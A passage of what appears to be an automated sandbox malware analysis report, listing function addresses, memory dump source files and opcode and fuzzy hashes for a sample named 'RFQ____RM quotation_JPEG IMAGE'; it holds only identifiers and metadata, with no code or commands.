                          • Opcode ID: 4391cf5c650e2ec7871891ba578251483ec75def2bb0dea52fb616d0332a8368
                          • Instruction ID: 48e25c3ac74dd489175cc1881ba52d46030e3dce5c4d3cf4c6ebab807a52802b
                          • Opcode Fuzzy Hash: 4391cf5c650e2ec7871891ba578251483ec75def2bb0dea52fb616d0332a8368
                          • Instruction Fuzzy Hash: 8EF05E74D0A208AFCB90DBA8D8445EDBBB9AB49314F1082EAD80897741D3355E16DFA1
                          Function 065B0BB9 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b9f3396d3c16f0a7df7e1eea56c5e43c7febf25c474fb057ab189fcd09b3a03
                          • Instruction ID: edcb58f029015b973f4a21c140eca0a6076181ba55683692f740cc3e4e032712
                          • Opcode Fuzzy Hash: 1b9f3396d3c16f0a7df7e1eea56c5e43c7febf25c474fb057ab189fcd09b3a03
                          • Instruction Fuzzy Hash: 6EF09035809248EFCB41CFA4D840DADBF75FF49304F14C0DAE85447292C6329A12DF91
                          Function 0684F600 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03299844f6a701756a08d11fc1ece1765014bc742a0d7ddbdd65943715f672bf
                          • Instruction ID: 238b7e6424135bb92c2fcc69d65414db1316c23a449584cf8439b561f80ce2ec
                          • Opcode Fuzzy Hash: 03299844f6a701756a08d11fc1ece1765014bc742a0d7ddbdd65943715f672bf
                          • Instruction Fuzzy Hash: 10F05E39300610DFD704DB29D854E2A77AAFFC8721B114469FA168B3A0CA31EC42CB90
                          Function 0650A168 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0c2c725b6323691d82b450af6b47d5e7d4159b867cb2fe0cd79a1e975588746f
                          • Instruction ID: 891b646abba53ed6b7cfbda7f8298a9ed95f1528809ee38faab00f2eba484858
                          • Opcode Fuzzy Hash: 0c2c725b6323691d82b450af6b47d5e7d4159b867cb2fe0cd79a1e975588746f
                          • Instruction Fuzzy Hash: D3F09634809248AFCB45CF94C8409ADBFB5EF49210F14C19AF85897282D235DE16DB50
                          Function 065B0335 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a2ac05c3c901e44b279b79ba48077c5d8ae134a9f9a46e9a97e7f07a3a38291
                          • Instruction ID: a10b54f3587a5e28d542f46996b654a7526291433a5bc067cb03a0ec1a25102e
                          • Opcode Fuzzy Hash: 9a2ac05c3c901e44b279b79ba48077c5d8ae134a9f9a46e9a97e7f07a3a38291
                          • Instruction Fuzzy Hash: 4C01F674A01218CFEB60DF68D844B9DB7B1FB09300F0081E5D449A3294C7749EC0CF10
                          Function 0650F6F0 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03012b023cfabb20b8fb203b410b26c4d84f775f868af7f3ea671d425af78d5d
                          • Instruction ID: b786977578549e3228b324242a97573c93dd86becb2c8911a0535329136428db
                          • Opcode Fuzzy Hash: 03012b023cfabb20b8fb203b410b26c4d84f775f868af7f3ea671d425af78d5d
                          • Instruction Fuzzy Hash: 20F0E53080A204AFDB55CF68E841CADBF75FF46310F1481EAE88557252C6358E06DFA1
                          Function 06509F92 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 89d31b71bce5995b60976489a7ac862d257d6fbc101f4d438d29d9e2d2d6093f
                          • Instruction ID: 59042caa8920db2131a1cf56e1c86c1aafd8d741ec30b0a0b6e6f2782809d640
                          • Opcode Fuzzy Hash: 89d31b71bce5995b60976489a7ac862d257d6fbc101f4d438d29d9e2d2d6093f
                          • Instruction Fuzzy Hash: 97F05470E09248AFC781DBA4D445599BBB4EB45214F1081DAE84497342D6359A01DF51
                          Function 0650EDE8 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d18fb5250184f0d1ba98c500008d3bc810e494f4b6a7a94e1e3b07348c0eb57e
                          • Instruction ID: 3e6088eaccecc2c36c0df17ebf8ca4004f7bc009715e427aa3037ae7ea4054b3
                          • Opcode Fuzzy Hash: d18fb5250184f0d1ba98c500008d3bc810e494f4b6a7a94e1e3b07348c0eb57e
                          • Instruction Fuzzy Hash: DAF03A34845208AFCB95DF98C8459DDBFB1EF89210F1480AEE8489A252D2718A55EB40
                          Function 06546608 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af919f36dd1aa1a85a4f3a834901ab6c1e8ccb7771b0451898cd8832517b064e
                          • Instruction ID: 94279bb6dddf0d47207a54584d53986ecb5997502f7c44cf3b9f3fa08ca53fd2
                          • Opcode Fuzzy Hash: af919f36dd1aa1a85a4f3a834901ab6c1e8ccb7771b0451898cd8832517b064e
                          • Instruction Fuzzy Hash: 05F06570C1A348DFCB91DFB89805AFD7FB8EF46310F2095E6E84592252D6304E55CB51
                          Function 065493C8 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: faf6a129ab0340bfcc7971363b5d472d8b1c126717546bb5da3768c689d53138
                          • Instruction ID: beb72ae5d90c7c45de3c69c850d22acd7132fa6fe212eae6ce93c4ecf721e537
                          • Opcode Fuzzy Hash: faf6a129ab0340bfcc7971363b5d472d8b1c126717546bb5da3768c689d53138
                          • Instruction Fuzzy Hash: CAE09274603208EFC701CFB8E9406DDBBBAEF45215B10479AE808E7301DA352E059791
                          Function 06547800 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86bfa6cc540f2ccdb09d19bdac62c60b40310a88ada8245a83ed4cb854088445
                          • Instruction ID: 2271e982c940d2b7b41d4c2041d0d016b5fb0bbec28a4506c7df38601b1a42a3
                          • Opcode Fuzzy Hash: 86bfa6cc540f2ccdb09d19bdac62c60b40310a88ada8245a83ed4cb854088445
                          • Instruction Fuzzy Hash: F4F06530D06248AFCB85EBA8D9546A8BFB4BB09215F1085EAD848D7352D7319A45CB91
                          Function 0650D691 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd02e4c020056d0232fa0fb26df6238aa5cde0d1d84c07802a91d14fc46db767
                          • Instruction ID: 5d68d03ee26e3965ea8c1386863b2c1821cb8e47b0733a2300f8821b88e4d844
                          • Opcode Fuzzy Hash: bd02e4c020056d0232fa0fb26df6238aa5cde0d1d84c07802a91d14fc46db767
                          • Instruction Fuzzy Hash: 76F04F307002069FEB84DF68EA4596E77B6FF89300B508569D406AB358CB74AD45CF50
                          Function 06507698 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db46fbbfa3a242c530d4f9aa438dde2b35daf9642a1e95ce56a855f1ed35f8bd
                          • Instruction ID: 4cb2b41abdb196036b1fb7a2ffcf282f56ea640cd0e86e56f46dfe919b582094
                          • Opcode Fuzzy Hash: db46fbbfa3a242c530d4f9aa438dde2b35daf9642a1e95ce56a855f1ed35f8bd
                          • Instruction Fuzzy Hash: 77F0A034D09308AFD785CBA8D8515BCBFB4FB49310F2080EAD88657392D630AE02CF92
                          Function 0650EF36 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea6ac711e13624c3f3bfca39fd56e03441b14950231fb2489374139adac58ee3
                          • Instruction ID: 5f6ab6492659c327971d5c3f36cf28be132b18f13638887b18086b16c93f7199
                          • Opcode Fuzzy Hash: ea6ac711e13624c3f3bfca39fd56e03441b14950231fb2489374139adac58ee3
                          • Instruction Fuzzy Hash: A6011970A1171A9BDB10EFA8C85069DF7B1FF88310F104659E50AA7344DB34AA84CB40
                          Function 06508400 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f348418bc244d8587c5eca07d0449af780e35d29eba059619bac30ad1695823
                          • Instruction ID: 95a2f7800da8bd85a9202a5f7a87c03a275093e4533ed8897b094990b0867189
                          • Opcode Fuzzy Hash: 0f348418bc244d8587c5eca07d0449af780e35d29eba059619bac30ad1695823
                          • Instruction Fuzzy Hash: 65E0D871C06204AFDF41DBF489059EA7BB8EF46324F1010EAE081D7193E9759F0997A1
                          Function 0650D023 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 04d767da44489b68cf0fbdb4304fa55c4f6e18f35d60cb2c18220d785770bef7
                          • Instruction ID: 794ce7a9a5004df7f94437722c9842f317a78294d6e4a0b692108865ea3fecf6
                          • Opcode Fuzzy Hash: 04d767da44489b68cf0fbdb4304fa55c4f6e18f35d60cb2c18220d785770bef7
                          • Instruction Fuzzy Hash: 40018C30B002158FDB94DF28DA99BAA73F6EB49300F1085B5D40E9B365CB749E82CF80
                          Function 0650E159 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b3b8dd11d5c717a8ea66e3292629c4d4473dca370fa575cb0994905ff858205a
                          • Instruction ID: 65bce01c89b69f48613d7e885f8c44a08293b98f602d9c38e4c9c79d4ea6b53f
                          • Opcode Fuzzy Hash: b3b8dd11d5c717a8ea66e3292629c4d4473dca370fa575cb0994905ff858205a
                          • Instruction Fuzzy Hash: D4F0A030D0A204AFDB84CBA8C9466E9BFB0EB06200F2045EED809D3292E6759E02CB40
                          Function 065471C7 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bee68c19137a715bd751b063956acd3db2544bb273fe6ca8c5b5e7468042a578
                          • Instruction ID: ef1ea77da6db9bc269dd1c6b60c1f50ad09e6a618ea9dec7521385647517a807
                          • Opcode Fuzzy Hash: bee68c19137a715bd751b063956acd3db2544bb273fe6ca8c5b5e7468042a578
                          • Instruction Fuzzy Hash: 25F09A34A09258CFDB10AF68CC98398BB71FF0B308F2080D5D04AA7255C7744D89CF92
                          Function 0650CF95 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a529442f4fe3ad77532e74c048fe562d8b2a0425b1d0a38932179118dfa7f1e
                          • Instruction ID: 786e83fc7e94a1e66fa1991ac7de9bbde2c639edc795ae2d8bb01e32d0f15be6
                          • Opcode Fuzzy Hash: 1a529442f4fe3ad77532e74c048fe562d8b2a0425b1d0a38932179118dfa7f1e
                          • Instruction Fuzzy Hash: CB016D30A402129FD794DF28E595FA973B5FF48300F8045AA901AABA54EB709D81DF40
                          Function 0650CE7A Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b25433d7a78def20167c80335be0c3af1c40f46a972947a93c1b355b63f92620
                          • Instruction ID: 65dda45478364bbaa4942e496dc79f472327f4b4015cae056eaf74903ae38027
                          • Opcode Fuzzy Hash: b25433d7a78def20167c80335be0c3af1c40f46a972947a93c1b355b63f92620
                          • Instruction Fuzzy Hash: 75F03C30B00214DFDB98DF28E959AA973F5FF5D300F5086A5904AAB254DBB49DC1CF80
                          Function 0650D30A Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8d289d0b0563c5bc056c766d9a609cb9cd98a3c9953a26606e652db57d4120e7
                          • Instruction ID: 4716dd36263cf968c5cf386907f8bde5e90bbfadd6909d17d55d9e4e38dc8bb1
                          • Opcode Fuzzy Hash: 8d289d0b0563c5bc056c766d9a609cb9cd98a3c9953a26606e652db57d4120e7
                          • Instruction Fuzzy Hash: 1EF03C30B002059FDB84DF68E999BAD77B5FF59300F40C5A6900AAB754CA705C81CF40
                          Function 0650D9E8 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 33545045e70b07674453922e22682eb12897245130929dd49a1ee719668b2ab3
                          • Instruction ID: b7b193711835aabbbebc7b87f4383d6928e29922cec8bd362055ffdda2339892
                          • Opcode Fuzzy Hash: 33545045e70b07674453922e22682eb12897245130929dd49a1ee719668b2ab3
                          • Instruction Fuzzy Hash: 08F03C306002148FDB94DF38E995AA977B1FF49300F9085A5940AAB654DB70AD81CF50
                          Function 01410CE0 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 183f40f332cbf9fe7ada43e715b6ae566997fab71129cea78d63337d417b48ee
                          • Instruction ID: 1a47db2df19c75cda3fc7132847f9ba81bd31ca29e80ee7c897967df8acf095a
                          • Opcode Fuzzy Hash: 183f40f332cbf9fe7ada43e715b6ae566997fab71129cea78d63337d417b48ee
                          • Instruction Fuzzy Hash: ABE04F32704218AFD714DAA8B4045DABBEDEB49271F10407BE50CC3644EA32A84187A0
                          Function 06546F56 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca95eacee079337aac8d0c92b15c2f49becde498c18efbec4b3c9cd8eaef014b
                          • Instruction ID: 545debe39b4622ac3759a57e9f14f913e32f7a5d4b4ce7b64742b9820d148268
                          • Opcode Fuzzy Hash: ca95eacee079337aac8d0c92b15c2f49becde498c18efbec4b3c9cd8eaef014b
                          • Instruction Fuzzy Hash: 27F0F474A10228DFDB60DF68E888B9CB7B2FB49314F504499E509A7344CB79AD84CF15
                          Function 065474F7 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 56ce32292796f6ad7ce73f61e665f951ca1f88854a68b058c99498f13353c68f
                          • Instruction ID: 6b7264a317a4bf7dc5c983eb573c9d249ddacdb134dfa071ad868da014b72d2a
                          • Opcode Fuzzy Hash: 56ce32292796f6ad7ce73f61e665f951ca1f88854a68b058c99498f13353c68f
                          • Instruction Fuzzy Hash: 94F0F474A04218DFCB94DF68E89879CB7B2FB4A314F5044A9E409AB745CB785EC8CF15
                          Function 06546878 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cfb395b981d3e6f39772e4fd42c59674e4818df2dce20e16ab744e51b344b509
                          • Instruction ID: 91f83ef841f991af5ad106aa540965d2b6825de8f8aa56f331c07c084ae062ea
                          • Opcode Fuzzy Hash: cfb395b981d3e6f39772e4fd42c59674e4818df2dce20e16ab744e51b344b509
                          • Instruction Fuzzy Hash: D8E0D83480B2049FCB50AB6494145BD7FB8AB47215F2051E5D80423242D6701E54D792
                          Function 065470C8 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 214c848412ffabd5eb8be9995b2a43037133d8993e2d2293ac4db0235bb7e1bd
                          • Instruction ID: 6c3dc2ab992f7ac21ebf7c9b7bf33dfcef5dc8d1a0a83522b70844a2e060caa9
                          • Opcode Fuzzy Hash: 214c848412ffabd5eb8be9995b2a43037133d8993e2d2293ac4db0235bb7e1bd
                          • Instruction Fuzzy Hash: 9BF0E774A14228DFDB50DF58E88879CB7B2FB49314F1040D9E409A7244CB785EC4CF25
                          Function 065B1F40 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b0f07bdf41a3dd65b1191322f9bc7963eaecb1f6dfa0bf376c1a8a7edd5dbdc0
                          • Instruction ID: 5eee594b21c302f94ab74c1c00e2e331027053d4012c44e5fd128ea25b854131
                          • Opcode Fuzzy Hash: b0f07bdf41a3dd65b1191322f9bc7963eaecb1f6dfa0bf376c1a8a7edd5dbdc0
                          • Instruction Fuzzy Hash: E6E06D3090A2049FCB85DBA4D8504A87FB1EB46220F24939AD4149B2D2C6355E05DB51
                          Function 06507C61 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 35baaf163d461de0ef59428a287d8fee6990d0959a323778bf039f79ac1cc703
                          • Instruction ID: 59db171bb0c337c52e3822a5cc2548ec609e00cdc101f85317571db244720d57
                          • Opcode Fuzzy Hash: 35baaf163d461de0ef59428a287d8fee6990d0959a323778bf039f79ac1cc703
                          • Instruction Fuzzy Hash: 8CE0263400B204AFD785CBA0D9449B57BBCFB0B220F1850CDE4054B383D675EE02DBA1
                          Function 065B28F0 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db7f8065fa1269f57b2ee1e2ebdff78b346fce40d263bd580fb48c0b227c5db0
                          • Instruction ID: ebfc3f4fd60324d7fdee0564d69e32a10595caf1cfcf7d245ccb35d414e4dfad
                          • Opcode Fuzzy Hash: db7f8065fa1269f57b2ee1e2ebdff78b346fce40d263bd580fb48c0b227c5db0
                          • Instruction Fuzzy Hash: 97E0DF3041B304AFC78697A698006A83B78EB03225F1006EAE0288B1D1CA799A40C7A1
                          Function 0650A178 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3cb482688f1d65fdfd515382a63bb72aca084a50a8fd4cf6f15e3645b01111e2
                          • Instruction ID: e87f9bc8ff80ee11bd70324cdf9b515eff11eeab35c39e2b5a6eb615a4488131
                          • Opcode Fuzzy Hash: 3cb482688f1d65fdfd515382a63bb72aca084a50a8fd4cf6f15e3645b01111e2
                          • Instruction Fuzzy Hash: 68F03974905208EFCB85CF98D840AADBBF9AB48310F14C0AAEC5897381C635DA11EF90
                          Function 06549410 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 318d8d1c83f1dc19a9e17c970e08e150e4de99cae6a46f39ee85c8efa7e386d5
                          • Instruction ID: 74742d6a512863a937892159e4f8bb2598eb5ff56908a5fa25cb8e67738ac01d
                          • Opcode Fuzzy Hash: 318d8d1c83f1dc19a9e17c970e08e150e4de99cae6a46f39ee85c8efa7e386d5
                          • Instruction Fuzzy Hash: 81E0ED70A42308EFCB10CF74EC91AEDBBB1EF89200F104999E5059B241DA351E00CB81
                          Function 065B1700 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 27d5431b6cce213eb836226b4dc7994620111a7b83e0c4941439b17e4205ac07
                          • Instruction ID: bcb453b8b2326193fade36ede85d56d81e9d4d894bf8ae094fbb587b6718a754
                          • Opcode Fuzzy Hash: 27d5431b6cce213eb836226b4dc7994620111a7b83e0c4941439b17e4205ac07
                          • Instruction Fuzzy Hash: 84F0F234905208EFCB80CF98D9409ACBBB5FB48310F1080A9A80967251C6729A21EF80
                          Function 0650B600 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28d8a4078302de0b3b9a278fe1c6ff083129675ca3c3ee802851f15974e65166
                          • Instruction ID: a66be4f50b58d887e36009523e4c272cd26003e8d37b044d59605ac194a1cdef
                          • Opcode Fuzzy Hash: 28d8a4078302de0b3b9a278fe1c6ff083129675ca3c3ee802851f15974e65166
